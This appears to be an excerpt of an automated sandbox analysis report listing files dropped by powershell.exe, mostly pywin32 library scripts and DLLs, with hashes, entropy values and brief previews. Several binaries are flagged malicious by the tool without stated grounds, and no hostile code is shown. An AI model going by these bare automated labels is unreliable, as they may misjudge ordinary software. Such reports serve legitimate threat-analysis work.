                                                                                                                                                                                                            Preview:# General purpose service utilities, both for standard Python scripts,..# and for for Python programs which run as services.....#..# Note that most utility functions here will raise win32api.error's..# (which is win32service.error, pywintypes.error, etc)..# when things go wrong - eg, not enough permissions to hit the..# registry etc.....import importlib.machinery..import os..import sys..import warnings....import pywintypes..import win32api..import win32con..import win32service..import winerror....error = RuntimeError # Re-exported alias......# Returns the full path to an executable for hosting a Python service - typically..# 'pythonservice.exe'..# * If you pass a param and it exists as a file, you'll get the abs path back..# * Otherwise we'll use the param instead of 'pythonservice.exe', and we will..# look for it...def LocatePythonServiceExe(exe=None):.. if not exe and hasattr(sys, "frozen"):.. # If py2exe etc calls this with no exe, default is current exe,.. # and
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35460
                                                                                                                                                                                                            Entropy (8bit):4.858121070650058
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:bBikoekq9PIVN/36WFBd03E8BKid9xmXTzRQ:bBrkELWFcdCzRQ
                                                                                                                                                                                                            MD5:45C928E12D7AB8C2C493AA59623B1A21
                                                                                                                                                                                                            SHA1:C1D1957CDFFC6A0D152CBA0980DFD7C10D0114AE
                                                                                                                                                                                                            SHA-256:5403596BB719683542A513868A5DAF13DEAB8B7BF04142A313F0755C5829AF87
                                                                                                                                                                                                            SHA-512:C2D764288394D54E8F73E5E456F3D3A581DAE5D2BF6463739FB9F18DF8BE26935A0DD7F059A72207C2EFF68A25F59604E90779427E72A5298746554B52FD6695
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: UTF-8 -*-..from __future__ import annotations...."""..win32timezone:.. Module for handling datetime.tzinfo time zones using the windows..registry for time zone information. The time zone names are dependent..on the registry entries defined by the operating system..... This module may be tested using the doctest module..... Written by Jason R. Coombs (jaraco@jaraco.com)... Copyright . 2003-2012... All Rights Reserved..... This module is licenced for use in Mark Hammond's pywin32..library under the same terms as the pywin32 library..... To use this time zone module with the datetime module, simply pass..the TimeZoneInfo object to the datetime constructor. For example,....>>> import win32timezone, datetime..>>> assert 'Mountain Standard Time' in win32timezone.TimeZoneInfo.get_sorted_time_zone_names()..>>> MST = win32timezone.TimeZoneInfo('Mountain Standard Time')..>>> now = datetime.datetime.now(MST).... The now object is now a time-zone aware obje
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1661
                                                                                                                                                                                                            Entropy (8bit):4.741614287122753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:aNWT3ujSA4qxhrGFzl5TxJAr55/zfs8EKqLGd61qdXcV/Yz5VxaaWTn:MWb85hqFzZuF1ULGd6tStVjan
                                                                                                                                                                                                            MD5:D4B81669210FC2C351E3EE4444ED41FB
                                                                                                                                                                                                            SHA1:B21E3D8679563BB69AE8DBF77BBE7713EB29ECA3
                                                                                                                                                                                                            SHA-256:7B4D9C029AA6C1ADC70AA4E539A7FCA9BE779AD7DC38E23276BDD817A8BD68AD
                                                                                                                                                                                                            SHA-512:37D2618B058CF7F6137EF88C0911989798019E096D8451F17338283A0B8B4FBBDF7AF9D10F7808AD5C1B4B4261801195DFC87122F23554BD7DBC038B153C8CFD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# This is a helper for the win32trace module....# If imported from a normal Python program, it sets up sys.stdout and sys.stderr..# so output goes to the collector.....# If run from the command line, it creates a collector loop.....# Eg:..# C:>start win32traceutil.py (or python.exe win32traceutil.py)..# will start a process with a (pretty much) blank screen...#..# then, switch to a DOS prompt, and type:..# C:>python.exe..# Python X.X.X (#0, Apr 13 1999, .....# >>> import win32traceutil..# Redirecting output to win32trace remote collector..# >>> print("Hello")..# >>>..# And the output will appear in the first collector process.....# Note - the client or the collector can be started first...# There is a 0x20000 byte buffer. If this gets full, it is reset, and new..# output appended from the start.....import win32trace......def RunAsCollector():.. import sys.... try:.. import win32api.... win32api.SetConsoleTitle("Python Trace Collector").. except:.. pass #
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7216
                                                                                                                                                                                                            Entropy (8bit):4.913627049323137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Uv11qTFi+A1cD+ZLfyhyxbI0Ix0IQ9xisGhyx8Iw7axVh+VGKaRxUWu/8ssRnQqZ:Uv1GvcpuK5Ys3Up81Rn+WDn
                                                                                                                                                                                                            MD5:C22C4B44FAF96CAA744EBABA70ACC6E9
                                                                                                                                                                                                            SHA1:E1EB8ABD4F16C3A8D346CD5F3B291392C2E6056D
                                                                                                                                                                                                            SHA-256:A1BB8719264E3DEB0751FF5CDF3A40F835616F73D5054BA37001B74C27722A08
                                                                                                                                                                                                            SHA-512:CF5D0612F927C3AD7B61966E7AF470AB505BDA362628BAC2AFC350E88A635EF2BAA85B8DF097590C080F6057891D002A7B840C81749C6F3EF4D0AAC0CAC4A904
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Stamp a Win32 binary with version information."""....import glob..import optparse..import os..import struct....from _win32verstamp_pywin32ctypes import (.. BeginUpdateResource,.. EndUpdateResource,.. UpdateResource,..)....VS_FFI_SIGNATURE = -17890115 # 0xFEEF04BD..VS_FFI_STRUCVERSION = 0x00010000..VS_FFI_FILEFLAGSMASK = 0x0000003F..VOS_NT_WINDOWS32 = 0x00040004....null_byte = b"\0"......#..# Set VS_FF_PRERELEASE and DEBUG if Debug..#..def file_flags(debug):.. if debug:.. return 3 # VS_FF_DEBUG | VS_FF_PRERELEASE.. return 0......def file_type(is_dll):.. if is_dll:.. return 2 # VFT_DLL.. return 1 # VFT_APP......def VS_FIXEDFILEINFO(maj, min, sub, build, debug=0, is_dll=1):.. return struct.pack(.. "lllllllllllll",.. VS_FFI_SIGNATURE, # dwSignature.. VS_FFI_STRUCVERSION, # dwStrucVersion.. (maj << 16) | min, # dwFileVersionMS.. (sub << 16) | build, # dwFileVersionLS.. (maj << 16) | min, # dwProductV
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):104517
                                                                                                                                                                                                            Entropy (8bit):4.829010215677823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:/Tn1x4p6rDFUzTdkS5efU7K9RgkhVJnKV:T1Op6kdkS5ef+QgqC
                                                                                                                                                                                                            MD5:D8314ACBD040837344B439A4F87FD2AB
                                                                                                                                                                                                            SHA1:FECEF8396288711E79D5DF0910BF6B3315AD04A3
                                                                                                                                                                                                            SHA-256:2CB4487EEE98EDAF0DC97974B2033ECAEFB6F176EBC83663095EE86B2E1F8F82
                                                                                                                                                                                                            SHA-512:C91B1CD50E5F19028CB2480F5E89AA828582D616FDC1ACC29BB380054B347F5C27C4EF0A66850CA247BD97E5E0285B88FA7BD81BB39D0281463ACDD21109F420
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Error related constants for win32....Generated by h2py from winerror.h.."""....# Few extras added manually.....TRUST_E_PROVIDER_UNKNOWN = -2146762751..TRUST_E_ACTION_UNKNOWN = -2146762750..TRUST_E_SUBJECT_FORM_UNKNOWN = -2146762749..TRUST_E_SUBJECT_NOT_TRUSTED = -2146762748..# up to here.......FACILITY_WINRM = 51..FACILITY_WINDOWSUPDATE = 36..FACILITY_WINDOWS_DEFENDER = 80..FACILITY_WINDOWS_CE = 24..FACILITY_WINDOWS = 8..FACILITY_URT = 19..FACILITY_UMI = 22..FACILITY_TPM_SOFTWARE = 41..FACILITY_TPM_SERVICES = 40..FACILITY_SXS = 23..FACILITY_STORAGE = 3..FACILITY_STATE_MANAGEMENT = 34..FACILITY_SSPI = 9..FACILITY_SCARD = 16..FACILITY_SHELL = 39..FACILITY_SETUPAPI = 15..FACILITY_SECURITY = 9..FACILITY_RPC = 1..FACILITY_PLA = 48..FACILITY_WIN32 = 7..FACILITY_CONTROL = 10..FACILITY_NULL = 0..FACILITY_NDIS = 52..FACILITY_METADIRECTORY = 35..FACILITY_MSMQ = 14..FACILITY_MEDIASERVER = 13..FACILITY_INTERNET = 12..FACILITY_ITF = 4..FACILITY_USERMODE_HYPERVISOR = 53..FACILITY_HTTP = 25..FACIL
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36454
                                                                                                                                                                                                            Entropy (8bit):4.993008637283139
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:R7c82fijQlPDc28ZWImfTR5KSnK+B+gRcZq4arZ2BsKL:R+fijE51TjKS1+Z2rZ2d
                                                                                                                                                                                                            MD5:20D40C3FED0D8085B1067E41B6D3EFE9
                                                                                                                                                                                                            SHA1:F0BEA5CAF96AE1B796D770488C3E27BF350E6DF3
                                                                                                                                                                                                            SHA-256:66C3CEF032150D1EE31FDFBE33E058580783978A231DFFFA36B6FF3060FB9CDD
                                                                                                                                                                                                            SHA-512:A50D2302F42F0B2DD509B942BF3B8C4D07FC032B47D36FC30AD4C5560D5F51F67CBC3B04F989AEEEAB69B35323DD01FCC22E5A7B98F35A6C07DA44395504E7C9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:## flags, enums, guids used with DeviceIoControl from WinIoCtl.h....import pywintypes..from ntsecuritycon import FILE_READ_DATA, FILE_WRITE_DATA......def CTL_CODE(DeviceType, Function, Method, Access):.. return (DeviceType << 16) | (Access << 14) | (Function << 2) | Method......def DEVICE_TYPE_FROM_CTL_CODE(ctrlCode):.. return (ctrlCode & 0xFFFF0000) >> 16......FILE_DEVICE_BEEP = 0x00000001..FILE_DEVICE_CD_ROM = 0x00000002..FILE_DEVICE_CD_ROM_FILE_SYSTEM = 0x00000003..FILE_DEVICE_CONTROLLER = 0x00000004..FILE_DEVICE_DATALINK = 0x00000005..FILE_DEVICE_DFS = 0x00000006..FILE_DEVICE_DISK = 0x00000007..FILE_DEVICE_DISK_FILE_SYSTEM = 0x00000008..FILE_DEVICE_FILE_SYSTEM = 0x00000009..FILE_DEVICE_INPORT_PORT = 0x0000000A..FILE_DEVICE_KEYBOARD = 0x0000000B..FILE_DEVICE_MAILSLOT = 0x0000000C..FILE_DEVICE_MIDI_IN = 0x0000000D..FILE_DEVICE_MIDI_OUT = 0x0000000E..FILE_DEVICE_MOUSE = 0x0000000F..FILE_DEVICE_MULTI_UNC_PROVIDER = 0x00000010..FILE_DEVICE_NAMED_PIPE = 0x00000011..FILE_DEVICE_NETW
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38459
                                                                                                                                                                                                            Entropy (8bit):5.098326334463726
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:9EUHjRWs4pq8ZBDK69QuyRj+l+4x2pAXy9WwkcmoTAOorQmQq:9dx4pq8ZBW6KuyslLouXy92cBKrQI
                                                                                                                                                                                                            MD5:3AB243938741058B4A4CC154ECF3D72F
                                                                                                                                                                                                            SHA1:1A22295F5AD8C9DEF2F095750D14477A5415CA3F
                                                                                                                                                                                                            SHA-256:AB090258FBF84E9156048D1DE281F78BA297680FE242EE744042063687A4C9FD
                                                                                                                                                                                                            SHA-512:D069240EC5A1AA2C3E24E6FDD3C56E21A8DDDE49A6CC88898905905A7035A43AD64B11095DF593AEEA3E0F767119AD64F265CE914F2F180DDEF46B760895A346
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from \mssdk\include\winnt.h....APPLICATION_ERROR_MASK = 536870912..ERROR_SEVERITY_SUCCESS = 0..ERROR_SEVERITY_INFORMATIONAL = 1073741824..ERROR_SEVERITY_WARNING = -2147483648..ERROR_SEVERITY_ERROR = -1073741824..MINCHAR = 128..MAXCHAR = 127..MINSHORT = 32768..MAXSHORT = 32767..MINLONG = -2147483648..MAXLONG = 2147483647..MAXBYTE = 255..MAXWORD = 65535..MAXDWORD = -1..LANG_NEUTRAL = 0..LANG_AFRIKAANS = 54..LANG_ALBANIAN = 28..LANG_ARABIC = 1..LANG_BASQUE = 45..LANG_BELARUSIAN = 35..LANG_BULGARIAN = 2..LANG_CATALAN = 3..LANG_CHINESE = 4..LANG_CROATIAN = 26..LANG_CZECH = 5..LANG_DANISH = 6..LANG_DUTCH = 19..LANG_ENGLISH = 9..LANG_ESTONIAN = 37..LANG_FAEROESE = 56..LANG_FARSI = 41..LANG_FINNISH = 11..LANG_FRENCH = 12..LANG_GERMAN = 7..LANG_GREEK = 8..LANG_HEBREW = 13..LANG_HINDI = 57..LANG_HUNGARIAN = 14..LANG_ICELANDIC = 15..LANG_INDONESIAN = 33..LANG_ITALIAN = 16..LANG_JAPANESE = 17..LANG_KOREAN = 18..LANG_LATVIAN = 38..LANG_LITHUANIAN = 39..LANG_MACEDONIAN = 47..LANG
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6147
                                                                                                                                                                                                            Entropy (8bit):4.529177286252088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:uPrOsJKymJTFcTFzTFiTFnTFtZJ9yR9SEFG+TFFPTxC4VZJOFYOx+D/M+jI7otlc:eOswymJq1Q9RmZnhHPokaR
                                                                                                                                                                                                            MD5:35F016ED6737ED122A2AECCC83026D54
                                                                                                                                                                                                            SHA1:6F89F0E8C1EA9005B8E5E521BF30E89012FF2D9F
                                                                                                                                                                                                            SHA-256:5E41B0870D34C18A120DE859DC3BF87D734133B2DECAC16E1A28E21D8D096F27
                                                                                                                                                                                                            SHA-512:1C04F40D549C172C5185C39D567ACF998A6430B07B6D1BE1CACF2F71F7F186416D21D7427F9C6BE13EB3958653C5A08922B75F2B9AA03657A09940074D2C0B17
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from winperf.h..PERF_DATA_VERSION = 1..PERF_DATA_REVISION = 1..PERF_NO_INSTANCES = -1..PERF_SIZE_DWORD = 0x00000000..PERF_SIZE_LARGE = 0x00000100..PERF_SIZE_ZERO = 0x00000200..PERF_SIZE_VARIABLE_LEN = 0x00000300..PERF_TYPE_NUMBER = 0x00000000..PERF_TYPE_COUNTER = 0x00000400..PERF_TYPE_TEXT = 0x00000800..PERF_TYPE_ZERO = 0x00000C00..PERF_NUMBER_HEX = 0x00000000..PERF_NUMBER_DECIMAL = 0x00010000..PERF_NUMBER_DEC_1000 = 0x00020000..PERF_COUNTER_VALUE = 0x00000000..PERF_COUNTER_RATE = 0x00010000..PERF_COUNTER_FRACTION = 0x00020000..PERF_COUNTER_BASE = 0x00030000..PERF_COUNTER_ELAPSED = 0x00040000..PERF_COUNTER_QUEUELEN = 0x00050000..PERF_COUNTER_HISTOGRAM = 0x00060000..PERF_TEXT_UNICODE = 0x00000000..PERF_TEXT_ASCII = 0x00010000..PERF_TIMER_TICK = 0x00000000..PERF_TIMER_100NS = 0x00100000..PERF_OBJECT_TIMER = 0x00200000..PERF_DELTA_COUNTER = 0x00400000..PERF_DELTA_BASE = 0x00800000..PERF_INVERSE_COUNTER = 0x01000000..PERF_MULTI_COUNTER = 0x02000000..PERF_DISPLAY_NO_SUFF
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):263
                                                                                                                                                                                                            Entropy (8bit):4.672839175459885
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:svKVMrg59fqwkAsQPlRGGRIhyRCuXp3FxXFZFnXL5GfpSLJM:iKV3r7zN1RIhykuZnhnkx4JM
                                                                                                                                                                                                            MD5:F23A557CEF326F909E604A909C4F8EA6
                                                                                                                                                                                                            SHA1:00A461AD95CA63E5506C891C19E6E6B35328C485
                                                                                                                                                                                                            SHA-256:A7A0B5CFD669010341B54B5A83F27FA98B9E353A8F34923980EA820AFA2EF7FA
                                                                                                                                                                                                            SHA-512:206109696B92B77D02B656D5B110AA663FA541968AD0B489EAA233535CB57373BACA088B98E880C599E95E1289421729F029A5E65D54E2E976A5C1AB628889BB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""A useful wrapper around the "_winxptheme" module.....Originally used when we couldn't be sure Windows XP apis were going to..be available. In 2022, it's safe to assume they are, so this is just a wrapper..around _winxptheme..."""....from _winxptheme import *..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:current ar archive
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):105102
                                                                                                                                                                                                            Entropy (8bit):5.466111660920853
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uRfuyd7YGHEkClkFTdHG06YVmouKj/SmtA8L3wegU6PDCrNoHHP7N3lcQig2uHIO:KlEllyTdHG0iBGOHP7sQiaTWsAOEGmBM
                                                                                                                                                                                                            MD5:E3B6F9F807D6EC095A8BEB448C8D32A3
                                                                                                                                                                                                            SHA1:6E8F71FA0313AF9B7CC9131CFD3FE54911E7FEE3
                                                                                                                                                                                                            SHA-256:6121A6E3426F45E38F2FB499AF33DE973924AB130B6FA15280317A014CBD0DB0
                                                                                                                                                                                                            SHA-512:E10DCBD5E3F167694243E0284337AF7B05C75212340CE31494BFA2A2C87022417E5F3A4A7F061A49F96C6B6A9F8901CFCBB35DBEEE90DCD41A9AE79FA4D1ACC9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:!<arch>./ -1 0 30008 `....O.........................*P..........u...u....................\...\..,f..,f..-...-...2...2....................v...v...................................|...|...................@...@...L...L..........................-...-...(...(...$...$...@...@...:@..:@..........m...m....n...n...........(...(...........P...P...........................F...F..."..."...H...H...................<...<..........$F..$F..........................#...#............@...@...h...h...................d...d...........t...t...F...F...........l...l...................................4...4...R...R...................b...b.......^..~...+...X...X...BR..BR...x...x........... ... ..u...u............N...N...R...R...........x...x..z...z...........{B..{B..........z...z....d...B.......b...b..R...R...Zt..Zt..D...D...v$..v$..........tx..tx..........s...s....................................D...D...:...:...........................................p...p...F...F..{...{.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1540
                                                                                                                                                                                                            Entropy (8bit):5.201699938565575
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:8VzOwJ7rYJUsxgPQDr432sOUV32s+EtXQ3twHy:BwJ7rYJU0I3V3qFKS
                                                                                                                                                                                                            MD5:26D041C60EE807220998827A4B4B1321
                                                                                                                                                                                                            SHA1:B636B54609467F4939F757E2AB0FDD8953C486F9
                                                                                                                                                                                                            SHA-256:11D8462E134E8EFE8F4BD52372292A72FF0B670753D2F49F71675EED0DBFD085
                                                                                                                                                                                                            SHA-512:F38E354408903BB7A50F9DAEAFFA1C37ACF159077B6920DCB0BEBB405BB1158AD795692E92DAF91620B01FF4611A77F2A375E867B69D0A8DB73E692D84E429A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Unless stated in the specfic source file, this work is..Copyright (c) 1994-2008, Mark Hammond..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:....Redistributions of source code must retain the above copyright notice,..this list of conditions and the following disclaimer.....Redistributions in binary form must reproduce the above copyright..notice, this list of conditions and the following disclaimer in..the documentation and/or other materials provided with the distribution.....Neither name of Mark Hammond nor the name of contributors may be used..to endorse or promote products derived from this software without..specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS..IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED..TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A..PARTICULA
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17920
                                                                                                                                                                                                            Entropy (8bit):5.819770675792178
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:5+UL/q4Cs1L32Dk3J3DfXf/PULQjdu+ju1BAM/CCqeiJYUY:5qk73J3DfXfLuMcGIzpUY
                                                                                                                                                                                                            MD5:46563A2D77C3687F2D3A6A6745F44665
                                                                                                                                                                                                            SHA1:A4F1EB06B66E468758BDC2CC271B6942360A26AE
                                                                                                                                                                                                            SHA-256:43790A4D797DFB87AB5007E44913F872C6C073DBD4594B39C41E7C90FB5EFFF3
                                                                                                                                                                                                            SHA-512:4DA92D1120D4D2D7903957F6FC5114349C6AD3BAF9678529EC24F96EE9CBB17CACC8660BEBDE06AE48B66E16A2429C3634BD3DD09539B3231FF50F18DCB94330
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.....p...p...p.......p.C.q...p.Z.q...p.C.u...p.C.t...p.C.s...p..q...p..q...p...q.U.p..y...p..p...p..r...p.Rich..p.........PE..L......g...........!....."... ......u!.......@............................................@..........................I..P....I..x....p..\.......................D....D..T............................D..@............@..$............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........`.......8..............@....rsrc...\....p.......<..............@..@.reloc..D............@..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):34304
                                                                                                                                                                                                            Entropy (8bit):6.07195785032541
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:m/m+OllJEdSFURReELPXFzqF5xERWxx2HVLZ:Om+OqeExuF5xERWxCL
                                                                                                                                                                                                            MD5:54D6413DE345942DF8A9DF248352077C
                                                                                                                                                                                                            SHA1:05C8B44EDD801C3BFF5955201724F2FFB7E4BD9F
                                                                                                                                                                                                            SHA-256:BF21538F5851ECF0C320187CB61E83B5F2950901A1F30167871D4A623934DE0F
                                                                                                                                                                                                            SHA-512:0515025EEAD92E01F87CBCDD5AF9088608646B790CA6C15D14C2556CB65FCEF962B9611FBB1C68A634555F835B6A4FF0DD34727E017C0365AEBC720B9A718EE4
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.. w..sw..sw..s~.Js}..s%..ru..s%..r{..s%..r}..s%..rv..s...ru..s...ru..s<..rr..sw..s...s...rv..s...rv..s...rv..sRichw..s........PE..L......g...........!.....L...6.......M.......`............................................@......................... r..H...hr..........L.......................L...4l..T............................l..@............`..<............................text...+K.......L.................. ..`.rdata.......`... ...P..............@..@.data...l............p..............@....rsrc...L............x..............@..@.reloc..L............|..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23040
                                                                                                                                                                                                            Entropy (8bit):5.703701896141669
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:pi14OW/KNbivlL7p95MlMHMyM60QYMuSeS71puKMjXaydkwKBQ7NC1qGQ0i/GN:0OKNAlL7VMlMHMyM60QYMunSxpuBCZeV
                                                                                                                                                                                                            MD5:26993B21F0EF0130CAEAEDBA351E4341
                                                                                                                                                                                                            SHA1:735F0ECDBA4FDB11CC7EEDD61AE4F79B834ED883
                                                                                                                                                                                                            SHA-256:04C9BA2AFCB509FD5EF3D977C051CB93B843634183E0076130B1F12813BA8695
                                                                                                                                                                                                            SHA-512:7D02A9D19A27FE582BD93E00D8A9CD34B34C938B82347C0578743F13492C5A43E10AFDAA0F7D61CC1931659676A0297589F5AD718EDED8C030D5A20F3852676B
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...%_..%_..%_..._..%_..$^..%_.$^..%_.. ^..%_..!^..%_..&^..%_X.$^..%_V.$^..%_..$_..%_X.,^..%_X.%^..%_X.'^..%_Rich..%_........PE..L... ..g...........!.........(......v*.......@............................................@..........................N..P...PN.......p..T.......................(....G..T...........................`G..@............@..,............................text...3,.......................... ..`.rdata..t....@.......2..............@..@.data...t....`.......J..............@....rsrc...T....p.......P..............@..@.reloc..(............T..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                            Entropy (8bit):5.5246197158244685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:x8rwsZ9LuOAfldyRfF6jE7TV/hOO/pOF09:xZvldynJzPhO29
                                                                                                                                                                                                            MD5:391DF46224D7868AF737F0C69612159C
                                                                                                                                                                                                            SHA1:0062F8F2CAE3E4216DC54DEA59CAA1A8D371CE4D
                                                                                                                                                                                                            SHA-256:A39073F8C35F57D27F8AE4D2075D487F2631D4E46E66813F35655B41351DB53D
                                                                                                                                                                                                            SHA-512:5EFE6D702814E370F52F4954F294DA5BD37FB42A8CFC366C5B1B516ACA304E586A137EBCE9B8CC0D1783A0CB7419917F25E90EF831A8282C99C973875D55BD37
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........TU...U...U...\...Q......W......_......_......T......P...U...x......T......T.....{.T......T...RichU...........................PE..L......g...........!................k .......0...............................p............@.........................P7.......7..x....P..,....................`......02..T............................2..@............0...............................text............................... ..`.rdata..*....0......."..............@..@.data........@.......0..............@....rsrc...,....P.......2..............@..@.reloc.......`.......<..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17408
                                                                                                                                                                                                            Entropy (8bit):5.436857417589604
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:yweJOXLVXp5ftMfeG6pPjTWwhTxk0ZfxbRqBN2hl:ywe8X/BtMmG6pvnhl3lFRqBN2h
                                                                                                                                                                                                            MD5:F76A593EFAE512972279E429EBD48C55
                                                                                                                                                                                                            SHA1:BF67E4CCF2757C194EF1AB65E9453A82EA8752B5
                                                                                                                                                                                                            SHA-256:29B5F70933ECAD82B96D27438F7C2FDE9678D0E0BFDA34BCDE66F33A7E85B9BF
                                                                                                                                                                                                            SHA-512:9701C5BC1ECCCBE25C3A8295223D9CD2F6786F5049C3B85A024D90A5493D410E902B95AEA294E00DF73C5279EED4C1E2E475BDA0E72C46869129335F5121EEE9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
